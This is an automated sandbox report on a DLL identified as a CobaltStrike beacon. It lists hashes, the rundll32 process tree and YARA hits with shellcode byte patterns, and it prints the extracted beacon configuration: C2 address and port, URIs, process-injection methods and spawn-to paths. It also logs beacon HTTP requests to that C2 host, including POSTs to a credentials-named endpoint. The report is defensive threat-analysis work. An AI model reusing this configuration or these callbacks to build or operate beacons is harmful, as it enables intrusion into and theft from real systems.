Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report GnGmRmwtZJjkTEt.dll

Overview

General Information

Sample Name:GnGmRmwtZJjkTEt.dll
Analysis ID:490528
MD5:c84d4ead6c5a2afa9e844806de549dcf
SHA1:328b4f055dce47161d735ef74f982925def45ee5
SHA256:829751cfdc2376e916244f94baf839ce4491ccb75f0a89778c092bde79bd8643
Infos:

Most interesting Screenshot:

Detection

CobaltStrike
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
System process connects to network (likely due to code injection or exploit)
Malicious sample detected (through community Yara rule)
Yara detected CobaltStrike
C2 URLs / IPs found in malware configuration
Uses known network protocols on non-standard ports
Yara signature match
Uses a known web browser user agent for HTTP communication
May sleep (evasive loops) to hinder dynamic analysis
Found evasive API chain checking for process token information
Uses code obfuscation techniques (call, push, ret)
Detected TCP or UDP traffic on non-standard ports
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
PE file contains more sections than normal
Program does not show much activity (idle)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll64.exe (PID: 2760 cmdline: loaddll64.exe 'C:\Users\user\Desktop\GnGmRmwtZJjkTEt.dll' MD5: A84133CCB118CF35D49A423CD836D0EF)
    • cmd.exe (PID: 4840 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\GnGmRmwtZJjkTEt.dll',#1 MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • rundll32.exe (PID: 3012 cmdline: rundll32.exe 'C:\Users\user\Desktop\GnGmRmwtZJjkTEt.dll',#1 MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 5868 cmdline: rundll32.exe C:\Users\user\Desktop\GnGmRmwtZJjkTEt.dll,gSDCSXjfiSV MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 1340 cmdline: rundll32.exe 'C:\Users\user\Desktop\GnGmRmwtZJjkTEt.dll',gSDCSXjfiSV MD5: 73C519F050C20580F8A62C849D49215A)
  • cleanup

Malware Configuration

Threatname: CobaltStrike

{"BeaconType": ["HTTP"], "Port": 8081, "SleepTime": 10000, "MaxGetSize": 1400218, "Jitter": 48, "C2Server": "185.93.6.31,/Calculate/team/WIQK6GMJ", "HttpPostUri": "/explode/Credentials/6R1C1XVKLMP", "Malleable_C2_Instructions": ["Remove 1182 bytes from the end", "Remove 929 bytes from the beginning", "Base64 URL-safe decode", "XOR mask w/ random key"], "SpawnTo": "AAAAAAAAAAAAAAAAAAAAAA==", "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\WUAUCLT.exe", "Spawnto_x64": "%windir%\\sysnative\\svchost.exe -k wksvc", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 0, "bStageCleanup": "True", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "False", "bProcInject_UseRWX": "False", "bProcInject_MinAllocSize": 18150, "ProcInject_PrependAppend_x86": ["ZpAPH4AAAAAADx9AAA8fRAAADx9EAAAPH0QAAGaQDx9AAA8fgAAAAAAPHwBmkGYPH4QAAAAAAA8fhAAAAAAA", "kGYPH4QAAAAAAA8fgAAAAACQDx8AkGaQUFgPHwAPH4QAAAAAAFBYDx8AUFhmDx9EAACQ"], "ProcInject_PrependAppend_x64": ["ZpBmkFBYDx+EAAAAAAAPH4AAAAAADx9AAA8fQABmDx+EAAAAAABmDx9EAAAPH0AADx9AAJCQUFgPH4AAAAAAZg8fhAAAAAAADx9EAABmkA8fhAAAAAAADx8A", "Zg8fRAAADx+AAAAAAGaQDx9AAA8fhAAAAAAADx9AAA8fRAAAkGYPH0QAAA8fAA=="], "ProcInject_Execute": ["ntdll:RtlUserThreadStart", "CreateThread", "NtQueueApcThread-s", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "NtMapViewOfSection", "bUsesCookies": "True", "HostHeader": ""}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.636963833.000000006BC03000.00000004.00020000.sdmpCobaltbaltstrike_RAW_Payload_http_stager_x64Detects CobaltStrike payloadsAvast Threat Intel Team
  • 0xe0:$h01: FC 48 83 E4 F0 E8 C8 00 00 00 41 51 41 50 52 51 56 48 31 D2 65 48 8B 52
00000005.00000002.636963833.000000006BC03000.00000004.00020000.sdmpJoeSecurity_CobaltStrike_3Yara detected CobaltStrikeJoe Security
    00000004.00000002.636959360.000000006BC03000.00000004.00020000.sdmpCobaltbaltstrike_RAW_Payload_http_stager_x64Detects CobaltStrike payloadsAvast Threat Intel Team
    • 0xe0:$h01: FC 48 83 E4 F0 E8 C8 00 00 00 41 51 41 50 52 51 56 48 31 D2 65 48 8B 52
    00000004.00000002.636959360.000000006BC03000.00000004.00020000.sdmpJoeSecurity_CobaltStrike_3Yara detected CobaltStrikeJoe Security
      00000003.00000002.640651466.0000019BD8300000.00000020.00000001.sdmpCobaltStrike_Sleep_Decoder_IndicatorDetects CobaltStrike sleep_mask decoderyara@s3c.za.net
      • 0xfa48:$sleep_decoder: 48 89 5C 24 08 48 89 6C 24 10 48 89 74 24 18 57 48 83 EC 20 4C 8B 51 08 41 8B F0 48 8B EA 48 8B D9 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9
      • 0x2abf2:$sleep_decoder: 48 89 5C 24 08 48 89 6C 24 10 48 89 74 24 18 57 48 83 EC 20 4C 8B 51 08 41 8B F0 48 8B EA 48 8B D9 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9
      Click to see the 25 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.2.rundll32.exe.6bc00000.0.unpackCobaltbaltstrike_RAW_Payload_http_stager_x64Detects CobaltStrike payloadsAvast Threat Intel Team
      • 0x1ee0:$h01: FC 48 83 E4 F0 E8 C8 00 00 00 41 51 41 50 52 51 56 48 31 D2 65 48 8B 52
      3.2.rundll32.exe.6bc00000.0.unpackJoeSecurity_CobaltStrike_3Yara detected CobaltStrikeJoe Security
        5.2.rundll32.exe.6bc00000.0.unpackCobaltbaltstrike_RAW_Payload_http_stager_x64Detects CobaltStrike payloadsAvast Threat Intel Team
        • 0x1ee0:$h01: FC 48 83 E4 F0 E8 C8 00 00 00 41 51 41 50 52 51 56 48 31 D2 65 48 8B 52
        5.2.rundll32.exe.6bc00000.0.unpackJoeSecurity_CobaltStrike_3Yara detected CobaltStrikeJoe Security
          4.2.rundll32.exe.6bc00000.0.unpackCobaltbaltstrike_RAW_Payload_http_stager_x64Detects CobaltStrike payloadsAvast Threat Intel Team
          • 0x1ee0:$h01: FC 48 83 E4 F0 E8 C8 00 00 00 41 51 41 50 52 51 56 48 31 D2 65 48 8B 52
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000005.00000003.251028132.00000243BE620000.00000040.00000001.sdmpMalware Configuration Extractor: CobaltStrike {"BeaconType": ["HTTP"], "Port": 8081, "SleepTime": 10000, "MaxGetSize": 1400218, "Jitter": 48, "C2Server": "185.93.6.31,/Calculate/team/WIQK6GMJ", "HttpPostUri": "/explode/Credentials/6R1C1XVKLMP", "Malleable_C2_Instructions": ["Remove 1182 bytes from the end", "Remove 929 bytes from the beginning", "Base64 URL-safe decode", "XOR mask w/ random key"], "SpawnTo": "AAAAAAAAAAAAAAAAAAAAAA==", "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\WUAUCLT.exe", "Spawnto_x64": "%windir%\\sysnative\\svchost.exe -k wksvc", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 0, "bStageCleanup": "True", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "False", "bProcInject_UseRWX": "False", "bProcInject_MinAllocSize": 18150, "ProcInject_PrependAppend_x86": ["ZpAPH4AAAAAADx9AAA8fRAAADx9EAAAPH0QAAGaQDx9AAA8fgAAAAAAPHwBmkGYPH4QAAAAAAA8fhAAAAAAA", "kGYPH4QAAAAAAA8fgAAAAACQDx8AkGaQUFgPHwAPH4QAAAAAAFBYDx8AUFhmDx9EAACQ"], "ProcInject_PrependAppend_x64": ["ZpBmkFBYDx+EAAAAAAAPH4AAAAAADx9AAA8fQABmDx+EAAAAAABmDx9EAAAPH0AADx9AAJCQUFgPH4AAAAAAZg8fhAAAAAAADx9EAABmkA8fhAAAAAAADx8A", "Zg8fRAAADx+AAAAAAGaQDx9AAA8fhAAAAAAADx9AAA8fRAAAkGYPH0QAAA8fAA=="], "ProcInject_Execute": ["ntdll:RtlUserThreadStart", "CreateThread", "NtQueueApcThread-s", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "NtMapViewOfSection", "bUsesCookies": "True", "HostHeader": ""}

          Networking:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\System32\rundll32.exeNetwork Connect: 185.93.6.31 145
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: 185.93.6.31
          Uses known network protocols on non-standard portsShow sources
          Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49740
          Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49741
          Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49742
          Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49743
          Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49744
          Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49745
          Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49746
          Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49747
          Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49749
          Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49751
          Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49754
          Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49755
          Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49756
          Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49757
          Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49758
          Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49759
          Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49762
          Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49763
          Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49764
          Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49765
          Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49766
          Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49767
          Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49768
          Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49769
          Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49770
          Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49787
          Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49790
          Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49809
          Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49810
          Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49811
          Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49815
          Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49818
          Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49821
          Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49836
          Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49850
          Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49851
          Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49852
          Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49853
          Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49854
          Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49855
          Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49856
          Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49857
          Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49858
          Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49859
          Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49861
          Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49865
          Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49866
          Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49867
          Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49868
          Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49869
          Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49870
          Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49871
          Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49872
          Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49873
          Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49874
          Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49875
          Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49876
          Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49877
          Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49878
          Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49879
          Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49880
          Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49881
          Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49882
          Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49883
          Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49884
          Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49885
          Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49886
          Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49887
          Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49888
          Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49889
          Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49890
          Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49891
          Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49892
          Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49893
          Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49894
          Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49895
          Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49896
          Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49897
          Source: global trafficHTTP traffic detected: GET /Register/v7.19/UJCIF1N2 HTTP/1.1Accept: application/json, application/xhtml+xml, image/*Accept-Language: zh-cnAccept-Encoding: identity, brUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Register/v7.19/UJCIF1N2 HTTP/1.1Accept: application/json, application/xhtml+xml, image/*Accept-Language: zh-cnAccept-Encoding: identity, brUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=fc3_iPE1_Vjq56xPxznPYCYBUHbVMTZf5vxQaRoTv0edTWJcgZ5LwLJnPm7dBsqNBWEXJlsZSPGhuf9XsqqC4HJa2koZmGEyVn-IZh37nM6NBwdS6ebkug90jlQud71sjfImxBQX6LVaJIkUUgAQN4xdzI3l1MCakLqA79lcimV7goHEUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=Q5hpQs5v1lLXXL79aYNOPZXYnxsOaoRhvLaKxRmYapzsO5INT1NEHR7ZxGVO8wQmPN3sdmwGzHIO8u1Y9VSB3ZOTbw4su34w3LFJu4vo30P1denpMflc7PjWYAyP5qxVNjYxO3QOUChWqJg1ui4s1jjWKFCimqGq9-ei73ZX1l4hNQ9tUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Register/v7.19/UJCIF1N2 HTTP/1.1Accept: application/json, application/xhtml+xml, image/*Accept-Language: zh-cnAccept-Encoding: identity, brUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=kmf3XTcOg_M1Un1ceOnglMUgQX9lOhjCEoU-77eE-OnhjXEsAvAHxtBYmt4NGrWRv_vKt0zBZFmX4pa376L-PojOC9qmp8nzLnkx3BccOQu4rxJJpurRp5pdd5QNIrusZzjTStJrAfcMoZRbZfiG9SPWq3cveQOrAtMMsU10KOz8Or69User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=rr1CTCJFQJw5lxGLFElypPVx7bIGQYubNYztrcljAoNOPd-YUu72BGEXg6oOdndJ1hGq4ohp9TVyyUKTYdo_JKEqZ47K6Nz2hQ81os6LIQped7qWOpZZftwEM5D9BwCoXoKbAMdnVXGJVDTQgXCt818tcUk2pH1eQ8o9KwosN6Go8jwAUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /explode/Credentials/6R1C1XVKLMP?_NDUSZDOG=CHBGJBMJBGCHKAPNBHCDKDPMBOCO HTTP/1.1Accept: image/*, application/xml, text/htmlAccept-Language: es-peAccept-Encoding: gzip, *User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Content-Length: 11120Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=7XJRhGCF7pR5toY7x2l2-zsyp92ggLynElyyA7dyUlpC0arL4bl827Az_KPgGTzgkjfUsMLs9LSgGNWeW765Gz15V8iCUUb2cltxfSUC54Vbn9EvnxNkKlY8WMohDJSTmNwJ_drkaO74QqDzFMQUEJY8EJYMcJlsWQ2aKdi97piP3zerUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /explode/Credentials/6R1C1XVKLMP?_NDUSZDOG=BEEBAOMDCBHADPPFCEHFDNPACA HTTP/1.1Accept: image/*, application/xml, text/htmlAccept-Language: es-peAccept-Encoding: gzip, *User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Content-Length: 11216Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=fc_1otimgQza-n-jl0HiayqIQ4CKkho9_S08EFgs-hYOJXPT7VgFOT_wmCHisrduUFPISKNpZqZ4SpRIAAr8wWdmCSVJD8sMwdEzI_i0O_RXBxC2SULTWHX1dWviirlTiJDRtT3DAwjjCZakilCECsx-qYjA0QFU7XsOTqLcKhMTkrxCUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /explode/Credentials/6R1C1XVKLMP?_NDUSZDOG=KDDINCJEJFALOEKAJEAIOLKAJB HTTP/1.1Accept: image/*, application/xml, text/htmlAccept-Language: es-peAccept-Encoding: gzip, *User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Content-Length: 11216Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=AwU8qo_9PnqUL29tufEMQljJk1Sr-fV9mDSTS2TbfGXjhaF-_1aI4syv_Uyjzgmve6nUBCXRi9PfcTx1zGJBwgySGWhnUKIQKLdLRGMzX-zzz8Rwly4nmHG8TXZQv35O8zrl5mrfK5ck7Eo2LMjTFfKVD6-bHAO47nJDzaeUSUcFSkLmUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
